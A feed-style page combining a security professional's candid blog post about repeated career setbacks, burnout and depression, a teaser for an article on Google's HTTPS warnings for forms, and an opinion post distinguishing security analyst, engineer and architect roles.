I really enjoyed the manager I worked for initially, but all that changed in February 2014 when my former mentor, with whom I did not at all get along, became the team manager. The stress levels immediately spiked as the focus quickly shifted to strong negativity. I had been struggling to get paper topics approved and was fighting against the reality that the target audience for Gartner research is not the leading edge of thinking, but the middle of the market. It took me nearly a full year to finally get my feet under me and start producing at an appropriate pace. My 1 yr mark roughly corresponded with the mid-year review, which was highly negative. By the end of the year I finally found my stride and had a ton of research in the pipeline (most of which would publish in early 2015). Unfortunately, the team manager, Captain Negative, couldn't see that and gave me one of the worst performance reviews I've ever received. It was hands-down the most insulted I'd ever been by a manager. It seemed very clear from his disrespectful actions that I wasn't wanted there, and so I launched an intensive job search. Meanwhile, I published something like 4 papers in 6 weeks while also having 4 talks picked up for that year's Security & Risk Management Conference. All I heard from my manager was negativity despite all that progress and success. I felt like shit, a total failure. There were no internal opportunities, so outward I looked, eventually landing at K12.

Oh, what a disaster that place was. K12 is hands-down the most toxic environment I've ever seen (and I've seen a lot!). Literally, all 10 people with whom I'd interviewed had lied to me - egregiously! I'd heard rumblings of changes in the executive ranks, but the hiring manager assured me there was nothing that would affect me. A new CIO - my manager's boss - started the same day I did. Yup, nothing that would affect me. Ha. Additionally, it turns out that they already had a "security manager" of sorts working in-house. He wasn't part of the interview process for my "security architect" role. They said they were doing DevOps, but it was just a side pilot that wasn't getting anywhere. Etc. Etc. Etc. Suffice to say, it was really bad. I frankly wondered how they were still in business, especially in light of the constant stream of lawsuits emanating from the states where they had "online public schools." Oy...

Suffice to say, I started looking for work on Day 1 at K12. But, there wasn't much there, and recruiters were loathe to talk to me given such a short stint. Explanations weren't accepted, and I was truly stuck. The longer I was there, the worse it looked. Finally, my old manager from AOL reached out as he was starting a CISO role at Ellucian. He rescued me and in October 2015 I started with them in a security architect role.

There's not much I can say about my experience at Ellucian. Things seemed ok at first, but after a CIO change a few months in, plus a couple other personnel issues, things got wonky, and it became clear my presence was no longer desired. When your boss starts cancelling weekly 1-on-1 meetings with you, it becomes pretty clear that he doesn't really want you there. New Context reached out in May 2016 and offered me an opportunity to do research and publishing for them, so I jumped at it and got the heck out of dodge. It turns out, this was a HUGE mistake, too...

There's even less I can say about New Context... we'll just put it at this: Despite my best efforts, I was never able to get things published due to a lack of internal approvals. After a year of banging my head against the wall, my boss and I concluded it wasn't going to happen, and they let me go a couple weeks later.

From there, I launched my own solo practice and signed what was to be a 20-wk contract with an LA-based client. They had been chasing me for several months to come help them out in a consulting (staff augmentation, really) capacity. I closed the deal with them and started on July 31st of this year. That first week was a mess with them not being ready for me on day 1, then sending me a botched laptop build on day 2, and then finally getting me online on day 3. I flew to LA to be on-site with them the following week and immediately locked horns with the other security architect. That first week on-site was horribly stressful. Things had finally started leveling off last wk, and then yesterday (Monday 8/28/17) they called and cancelled the contract. While I'm disappointed, it's also a bit of a relief. It wasn't a good fit, it was a very difficult client experience, and overall I was actively looking for new opportunities while I did what I could for them.

Shared Culpability or Mea Culpa?

After all these years, I'm tired of taking the blame and being the seemingly constant punchline to some joke I don't get. I'm tired, I'm burned-out, I'm frustrated, I'm depressed, and more than anything I just don't understand why things have gone so completely wrong over the past 10 years. How could one poor decision result in so much career chaos and heartache? It's astonishing. And appalling. And depressing.

I certainly share responsibility in all of this. I tend to be a fairly high-strung person (less so over the years) and onboarding is always highly stressful for me. Increasingly, employers want you engaged and functional on Day 1, even though that is incredibly unrealistic. Onboarding must be budgeted for a minimum of 3-6 months. If a move is involved, then even longer! Yet nobody is willing to allow that any more. I don't know if it's mythology or downward pressure or what... but the expectations are completely unreasonable.

But I do have a responsibility here, and I've certainly not been Mr. Sunshine the past few years, which means I tend to come off as extremely negative and sarcastic, which can be off-putting to people. Attitude is something I need to focus on when starting, and I need to find ways to better manage all the stress that comes with commencing a new gig.

That said, I also seem to have a knack for picking the wrong jobs. This even precedes my time at AOL, which is really a shining anchor in the middle of a turbulent career. Coming into the workforce just before the DOT-COM bubble burst, I've been through lots of layoffs and turmoil. I simply have a really bad track record of making good employment choices. I'm not even sure how to go about fixing that, short of finding people to advise me on the process.

However, lastly, it's important for companies to realize that they're also failing employees. The onboarding process is immensely important. Treating people respectfully and mindfully from Day 1 is immensely important. Setting reasonable expectations is immensely important. If you do not actively work to set your personnel up for success, then it is extremely unlikely that they'll achieve it! And even in this day and age where companies really, truly don't value personnel (except for execs and directors), it must be acknowledged that there is a significant cost in lost productivity, efficiency, and effectiveness that can be directly tied to employee turnover. This includes making sure managers are reasonably well trained and are actually well-suited to being managers. You owe it to your employees to treat them as humans, not just replaceable cogs in a machine.

Where To Go From Here?

The pull of deep depression is ever stronger. Resistance becomes evermore difficult with each successive failure. I feel like I cannot buy a break. My career is completely off-track and I decreasingly see a path to recovery. Every morning is a struggle to get up and look for work yet again. I feel like I've been doing this almost constantly for the past 10 years. I've not been settled anywhere since AOL (maybe BT).

I initially launched a solo practice, Falcon's View Consulting, to handle some contracts. And, that's still out there if I need it. However, what I really need is a full-time job. With a good, stable company. In a role with a good manager. A role that eventually has upward mobility (in order to get back on track).

Where that role is based I really do not care (my family might). Put me in a leadership role, pay me a reasonable salary, and relocate me to where you need me. At this point, I'm willing to go to bat and force the family to move, but you gotta make it easy and compelling. Putting me into financial hardship won't get it done. Putting me into a difficult position with no support won't get it done. Moving me and not being committed to keeping me onboard through the most stressful times won't get it done.

I'm quite seriously at the end of my rope. I feel like I have about one more chance left, after which it'll be bankruptcy and who knows what... I've given just about everything I can to this industry, and my reward has been getting destroyed in the process. This isn't sustainable, it isn't healthy, and it's altogether stupid.

I want to do good work. I want to find an employer that values me that I can stay with for a reasonable period of time. I've never gone into any FTE role thinking "this is just a temporary stop while I find something better." I throw my whole self into my work, which is - I think - why it is so incredibly painful when rejection and failure final happen. But I don't know another way to operate. Nor should anyone else, for that matter.

Two roads diverged in the woods / And I... I took the wrong one / And that has made all the difference

Google Begins Campaign Warning Forms Not Using HTTPS Protocol

August 2014, Google released an article sharing their thoughts on how they planned to focus on their “HTTPS everywhere” campaign (originally initiated at their Google I/O event). The premise of...

Read More

The post Google Begins Campaign Warning Forms Not Using HTTPS Protocol appeared first on PerezBox.

On Titles, Jobs, and Job Descriptions (Not All Roles Are Architects)

Folks: Please stop calling every soup-to-nuts, everything-but-the-kitchen-sink security job a "security architect" role. It's harmful to the industry and it's doing you no favors trying to find the right resources. In fact, please stop posting these "one role does everything security under the sun" positions altogether. It's hurting your recruitment efforts, and it makes it incredibly difficult to find positions that are a good fit. Let me explain...

For starters, there are generally three classes of security people, management and pentesters aside:
- Analysts
- Engineers
- Architects

(Note that these terms tend to be loaded due to their use in other industries. In fact, in some states you might even have to come up with a different equivalent term for positions due to legal definitions (or licensing) of roles. Try to bear with me and just go with the flow, eh?)

Analysts are people who think about stuff and write about stuff and sometimes help initiate actions, but they are not the implementers of security tools or practices. An analyst may or may not be particularly technical, depending on the nature of the role. For example, there are tons of entry-level SOC analyst positions today that can provide a first taste of infosec work life. You rarely need to have a lot of technical skills, at least initially, to land one of these gigs (this varies by org). Similarly, there are GRC analyst roles that tend not to be technical at all (despite often including "technical writing," such as for policies, in the workload). On the far end of the spectrum, you may have incident response (IR) analysts who are very technical, but again note the nature of their duties: thinking about stuff, writing about stuff, and maybe initiating actions (such as the IR process or escalations therein).

Engineers are people who do most of the hands-on work. If you're looking for someone to do a bunch of implementation work, particularly around security tools and tech, then you want a security engineer, and that should be clearly stated in your job description. Engineers tend to be people who really enjoy implementation and maintenance work. They like rolling up their sleeves and getting their hands dirty. You might also see "administrator" used in this same category (though that's muddy water as sometimes a "security administrator" might be more like an analyst in being less technical, skilled in one kind of tool, like adding and removing users to Active Directory or your IAM of choice). In general, if you're listing a position that has implementation responsibilities, then you need to be calling it an engineer role (or equivalent), not an analyst and certainly not an architect.

Architects are not your implementers. And, while they are thinkers who may do a fair amount of technical writing, the key differentiators here are that 1) they tend to be way more technical than the average analyst, 2) they see a much bigger picture than the average analyst or engineer, and 3) they've often risen to this position through one or both of the other roles, but almost certainly with considerable previous hands-on implementation experience as an engineer. It's very important to understand that your architects, while likely having a background in engineering, is unlikely to want to do much hands-on implementation work. What hands-on work they are willing/interested to do is likely focused heavily on proofs of concept (POCs) and testing new ideas and technologies. Given their technical backgrounds, they'll be able to go toe-to-toe on technical topics with just about anyone in the organization, even though they may not be able to sit down and crank out a bunch of server builds in short order any more (or, maybe they can!). A good security architect provides experiential, context-relevant guidance on how to design /secure/ systems and applications, as well as providing guidance on technology purchasing decisions, technical designs, etc. Where they differ from, say, GRC/policy analysts is that when they provide a recommendation on something, they can typically back it up with more than a flaccid reference to "best practices" or some other lame appeal to authority; they can instead point to proven experiences and technical rationale.

Going all the way back to before my Gartner days, I've long told SMBs that their first step should not be hiring a security manager, but rather a security architect who reports up through the IT food chain, preferably directly to the IT manager/director or CIO (depending on size and structure of the org). The reason for this recommendation is that small IT shops already have a number of engineers/administrators and analysts, but what they oftentimes lack is someone with broad AND deep technical expertise in security who can provide all sorts of guidance and value to the organization. Part and parcel to this is that SMBs especially do not need to build out a "security team" or "security department"! (In fact, I often argue only the largest enterprises should ever go this route, and only to improve efficiency and effectiveness. Status quo and conventional wisdom be damned.) Most small IT shops just need someone to help out with decisions and evaluations to ensure that the organization is making smart security decisions. This security architect role should not be focused on implementation or administration, but instead should be serving in an almost quasi-EA (enterprise architect) role that cuts across the entire org. In many ways, a security architect in a counselor who works with teams to improve their security decisions. It's common in larger organizations for security architects to have a focus on one part of the business simply as a matter of scale and supportability.

So that's it. Nothing too crazy, right? But, I think it's important. Yes, some of you may debate and question how I've defined things, and that's fine, but the main takeaway here, hopefully, is that job descriptions need to be reset again around some standard language. In particular, orgs need to stop listing a ton of implementation work for "security architect" roles because that's misleading and really not what a security architect does. Properly titling and describing roles is very important, and will help you more readily find your ideal candidates. Calling everything a "security architect" does not do anything positive for you, and it serves to frustrate and disenfranchise your candidate pools (not to mention wasting your time on screening).

fwiw. ymmv. cheers!